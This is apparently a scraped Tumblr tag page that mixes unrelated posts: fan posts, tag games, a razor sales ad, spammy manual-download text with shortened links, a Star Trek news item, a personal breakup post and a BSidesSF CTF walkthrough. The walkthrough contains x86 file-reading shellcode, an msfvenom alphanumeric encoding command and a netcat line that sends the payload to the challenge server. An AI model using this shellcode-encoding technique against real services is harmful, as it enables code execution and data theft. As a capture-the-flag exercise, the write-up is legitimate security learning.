Tumgik
#xeb post
xebecdav · 10 days
Text
Tumblr media
Happy 13th birthday Portal 2!! Thanks for being truly one of the games of all time.
592 notes · View notes
oleander-comic · 8 months
Text
Weekly Update
Earlier today I finished all of the sketches for Chapter 10, with me being right about it being 4 pages. Ch 11 will probably be like 5 or 6 pages.
School work is a bit suffocating rn so I will not be as speedy quick as last time, even when I do finish the Ch 11 sketches (sketches are always the longest part anyways) the lines, colors, etc will take a Hot Minute becuase waugh Junior year.
Anyways that is it <3 Still planning to do a double feature with Ch10/Ch11 so.
-Xebec
9 notes · View notes
shehzadi · 2 years
Text
tagged by @howljenkinsgf @gruesomegf @transfilmbro @twinpeaksrecord to post 9 of my fav movies tyyyy kat + luna + riv + xeb <333
Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media
tagging @belovedbi @fennecshandgf @oatmealbf @ocdnatural @knivesgf @khizhina @industrialgroupie @arthurianmotifs
13 notes · View notes
rickcaron2008 · 2 years
Video
youtube
SOTD 10/4/22Richards Razors We Are SellingPrice $170.00Shipping $7.50 USAwe now use 'GlobalShipping' for International Orders It Is Much Less Expensive Than USPS! Gillette Fat Boy Razor Adjustable TTO Refurbished Replated Gold Palladium E4–GP1https://youtu.be/B6k-XeB-LfA… VideoHttps://Jaime2283.Blogspot.com/ (47 More Pics)Please Be Sure to Look Carefully at All the Pictures Also See the Pictures We Have Posted on YouTube and Blogger for Any FlawsAlso available on eBay/Caron522012http://www.etsy.com/shoprichardsrazors/Http://www.Bonanza.Com/Booths/Rckandrews45http://richardsrazors.ecrater.com/https://jaime2283.blogspot.com/(47 more pics)
0 notes
xalecelap · 2 years
Text
Md 86751 bedienungsanleitung sony
  MD 86751 BEDIENUNGSANLEITUNG SONY >> DOWNLOAD LINK vk.cc/c7jKeU
  MD 86751 BEDIENUNGSANLEITUNG SONY >> READ ONLINE bit.do/fSmfG
           Code Source Lecteur Multimédia Full HD MEDION LIFE E85023 MD 86596 Wiederherstellungs Anleitung MEDION Android Mobilgeräte (Intel Bay-Trail) Ich biete hier ein Bluetooth Headset von Medion, das E83047 (MD 86751), an. Biete hier ungenutzte Bluetooth Kopfhörer von Sony an Sie wurden kaum Ich biete hier ein Bluetooth Headset von Medion, das E83047 (MD 86751), an. Biete hier ungenutzte Bluetooth Kopfhörer von Sony an Sie wurden kaum Headset mit Bluetooth-Funktion MEDION E83047 (MD 86751) Bedienungsanleitung Inhaltsverzeichnis Zu dieser Anleitung 2 In dieser Anleitung verwendete Symbole Code Source Lecteur Multimédia Full HD MEDION LIFE E85023 MD 86596 Wiederherstellungs Anleitung MEDION Android Mobilgeräte (Intel Bay-Trail) JP3663900003 255124 XEB FV EUR SONY CORP. N. SONY FINANCIAL HLDG INC. 11:10:50 0 0 131,227 131,451 08:28:52 11:10:50 0 0 86,615 86,751 08:28:53Headset mit Bluetooth-Funktion MEDION E83047 (MD 86751) Bedienungsanleitung Inhaltsverzeichnis Zu dieser Anleitung 2 In dieser Anleitung verwendete Symbole
https://kidekafefu.tumblr.com/post/693065064821981184/mfc-7320-bedienungsanleitung-target, https://moxigolob.tumblr.com/post/693064509800185856/ignis-akl-499-bedienungsanleitung-hd, https://bukecehoweju.tumblr.com/post/693064611544678400/vitocell-100-bedienungsanleitung-philips, https://bukecehoweju.tumblr.com/post/693064848272244736/wetterstation-diva-weatherboy-bedienungsanleitung, https://kidekafefu.tumblr.com/post/693065363574898688/sony-kdl-32-w-655-abaep-bedienungsanleitung.
0 notes
katiecanblog · 3 years
Photo
Tumblr media
xEB Art and Existence
Here’s another Digital Artbook entry! This one is for my barely used Insta “darkpalaye” where I used to post Palaye Royale edits. Might revisit that account because my hyperobsession is coming back with the arrival of Emerson’s comic book.
11 notes · View notes
bookspicelatte · 4 years
Photo
Tumblr media
Hey Pumpkins ♡ Quick post today as I had a really bad headache the whole day and now I'm pretty destroyed! I hope ya'll are better than me ♡ 🌙 This beautiful candle is from @buchmaedchen_de ❤ I just love, love love bookish candles so much! 🌙 (Unpaid AD) #book #bookstagram #bookshelf #reading #bookworm #cosy #candles #daslesenistschön #bookstack #booklover #reader #bookish #bookaddict #booknerd #booklove #bookaesthetic #lesen #read #bookstagrammer #bookblogger  #booksofig #bücher #readingismagic #buch #welovebooks #bookishcandle #buchmaedchenbestellung #buchmaedchen #autumn (at Munich, Germany) https://www.instagram.com/p/B-xeb-OqkxM/?igshid=r7fkca9pjrde
0 notes
xebecdav · 12 days
Text
Tumblr media
626 notes · View notes
blogmvaidoso · 5 years
Photo
Tumblr media
Sabes o que são Social Posts? Claro que sim, navega pelo link: http://bit.ly/2HUSjao, dá largas à tua imaginação. A tua marca pessoal/profissional ao alcance de um clique! (em Parada Alto São João) https://www.instagram.com/p/Bx-XEb-nHs2/?igshid=1mp54h13lb4pe
0 notes
shehzadi · 2 years
Text
tagged by @lapvona and @twinpeaksrecord to post 6 albums i’ve had on repeat (except i could only think of 5)! ty anir ty xeb <3 <3 :)
Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media
the eminem show / the marshall mathers lp / led zeppelin 1969 / back in black / amir
(i’ve been stuck in a loop of listening to the same 5 artists for months but i’m not even mad i’m having a ball on this bitch)
tagging @legallybrunette1997 @aidaughter @arthurianmotifs @fennecshandgf @venuspdf @gownhouse
8 notes · View notes
randiggles · 4 years
Text
I honestly feel disgusted with myself right now just knowing that i was involved with you. I should have walked away the first time you cheated on me and i have to live with that daily. Even after mario, both chris's, ron, coming on to xeb at the trifinity i still tried to be there for you because you had me convinced you were trying to change and break the cycle, but learning you had started a whole new relationship before i Even got home from south Carolina and were going to the extent to block me from seeing all the fb posts of you and him proves once and for all this is just who you are. You are incapable of being honest with anyone much less yourself and now that you have started your same destructive cycle over again i can honestly walk away with my head held high knowing i tried. You know what you're doing. Goodbye
0 notes
laflechanet · 7 years
Text
Nueva noticia publicada en LaFlecha
New Post has been published on https://laflecha.net/star-trek-discovery-se-estrenara-en-septiembre/
Star Trek: Discovery se estrenará en septiembre
Tumblr media
Netflix ha anunciado que estrenará la serie Star Trek: Discovery el lunes 25 de septiembre en todo el mundo, excepto Estados Unidos y Canadá. En la primera entrega de esta nueva encarnación de la legendaria serie de ciencia ficción creada por Gene Roddenberry, los suscriptores de la plataforma de streaming podrán acceder a los primeros dos episodios y los lunes posteriores a un episodio nuevo por semana hasta completar una primera tanda de ocho capítulos. Para ver la primera temporada completa, que consta de 15 episodios, habrá que esperar hasta enero de 2018, cuando estarán disponibles los siete capítulos restantes.
Star Trek es una de las franquicias más populares de la historia de la televisión y cumple actualmente 50 años de existencia. Con esta nueva propuesta –Star Trek: Discovery-, la misma vuelve a cobrar actualidad. El nuevo programa seguirá los viajes de la Flota Estelar en sus misiones para descubrir nuevos mundos y nuevas formas de vida contará con una nueva nave, nuevos personajes y nuevas misiones pero con el mismo estilo que atrapó a varias generaciones de admiradores.
Michelle Yeoh, Sonequa Martin Green, Jason Isaacs, Doug Jones, Shazad Latif encabezan el elenco, mientras que Alex Kurtzman, Bryan Fuller, Heather Kadin, Gretchen J. Berg & Aaron Harberts, Akiva Goldsman, Rod Roddenberry y Trevor Roth son los productores ejecutivos de este proyecto.
Star Trek, una de las franquicias de televisión más emblemáticas e influyentes, regresa a la televisión 50 años después de su estreno con Star Trek: Discovery, que seguirá los viajes de la Flota Estelar en sus misiones para descubrir nuevos mundos y nuevas formas de vida y a un oficial de la Flota que debe de aprender que, para entender verdaderamente todas las cosas extrañas, primero debe entenderse a sí mismo.
La serie contará con una nueva nave, nuevos personajes y nuevas misiones, pero con la misma ideología y esperanza que inspiró a una una generación de soñadores y creadores.
https://www.youtube.com/watch?time_continue=16&v=XeB-_XjcTNs
Fuente: Lanacion.com.ar
0 notes
xpnsec · 7 years
Text
BSidesSF CTF: b-64-b-tuff Walkthrough
This week I was part of team "NeverTry" who competed in the BSidesSF online capture the flag. As far as CTF's go, this was a fun one, taking place over 2 days there were a range of cool puzzles and flags to find.
Over a series of upcoming posts I'll be running through the solutions for a number of my favourite challenges, starting with b-64-b-tuff.
This challenge started with a simple application which receives binary shellcode over the network, and executes the payload. The aim is simple, read the contents of /home/ctf/flag.txt.
This challenge however came with a twist, let's have a look at the source code of the running service:
#include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #define LENGTH 1024 #define disable_buffering(_fd) setvbuf(_fd, NULL, _IONBF, 0) int verify(uint8_t *hash, uint8_t *data, size_t length) { uint8_t buffer[MD5_DIGEST_LENGTH]; MD5_CTX ctx; MD5_Init(&ctx); MD5_Update(&ctx, data, length); MD5_Final(buffer, &ctx); return !memcmp(buffer, hash, MD5_DIGEST_LENGTH); } int main(int argc, char *argv[]) { uint8_t *buffer = mmap(NULL, LENGTH, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); ssize_t len; alarm(10); disable_buffering(stdout); disable_buffering(stderr); printf("Send me stuff!!\n"); len = read(0, buffer, LENGTH); if(len <code>\n"); exit(1); } if(!verify(buffer, buffer+16, len - 16)) { printf("md5sum didn't check out!\n"); printf("Expected: <md5sum><code>\n"); exit(1); } asm("call *%0\n" : :"r"(buffer)); return 0; }
That's right, the payload will be Base64 encoded before being executed.
To start with, we grab a simple Linux x86 read() shellcode and modify it to read the flag:
http://shell-storm.org/shellcode/files/shellcode-73.php
/* Linux/x86 file reader. 65 bytes + pathname Author: certaindeath char main[]= "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\xeb\x32\x5b\xb0\x05\x31\xc9\xcd" "\x80\x89\xc6\xeb\x06\xb0\x01\x31" "\xdb\xcd\x80\x89\xf3\xb0\x03\x83" "\xec\x01\x8d\x0c\x24\xb2\x01\xcd" "\x80\x31\xdb\x39\xc3\x74\xe6\xb0" "\x04\xb3\x01\xb2\x01\xcd\x80\x83" "\xc4\x01\xeb\xdf\xe8\xc9\xff\xff" "\xff" "/home/ctf/flag.txt\x00"
Obviously when Base64 encoded, the above payload is going to be corrupted, so we need to Base64 decode our binary shellcode before sending it to the server.
A Base64 encoded string consists of a character set of A-Z, a-z and 0-9, so our payload will need to consist of this character set only.
... enter Metasploit's x86/alpha_mixed encoder :)
Let's attempt to encode the payload and see what happens:
python -c 'import sys; sys.stdout.write("\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/home/ctf/flag.txt\x00")' | msfvenom -p - -e x86/alpha_mixed -a linux -f raw -a x86 --platform linux | hexdump -C
When run through hexdump, we get the following output:
As you can see, not all of the encoded shellcode is ASCII, we have a small section at the beginning which is outside of our desired "A-Za-z0-9" ASCII set.
The reason for this is due to the stub which is prepended and is used to identify our shellcode in memory. A quick Google search and we find the following post from OffensiveSecurity showcasing the encoder: https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/.
It turns out that we can use the "BufferRegister" advanced option to specify a register which points to our shellcode. When provided, this helps to remove the stub we saw above. Let's throw the binary into radare2 and see what registers may point to our code:
The final "call" instruction relates to the asm("call *%0\n" : :"r"(buffer)); that we saw in the server source code, so eax looks like a good candidate :). Let's update the msfvenom options and review the output:
Looks good, we are ready to decode the payload and exploit:
python -c 'import sys; sys.stdout.write("\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/home/ctf/flag.txt\x00")' | msfvenom -p - -e x86/alpha_mixed -a linux -f raw -a x86 --platform linux BufferRegister=EAX | base64 -d | nc b-64-b-tuff-c4f89487.ctf.bsidessf.net 5757
1 note · View note